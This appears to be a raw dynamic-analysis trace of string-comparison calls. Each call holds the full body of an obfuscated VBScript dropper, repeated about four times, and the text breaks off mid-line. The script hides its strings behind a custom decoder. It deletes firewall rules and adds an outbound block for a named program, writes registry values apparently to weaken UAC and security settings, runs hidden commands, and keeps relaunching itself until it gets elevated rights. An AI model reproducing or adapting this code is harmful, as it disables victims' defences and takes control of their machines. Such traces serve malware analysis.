WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.315] wcsncmp (_String1="\r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -30 [0226.315] wcsncmp (_String1="\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.315] wcsncmp (_String1="\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -4 [0226.315] wcsncmp (_String1="bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite 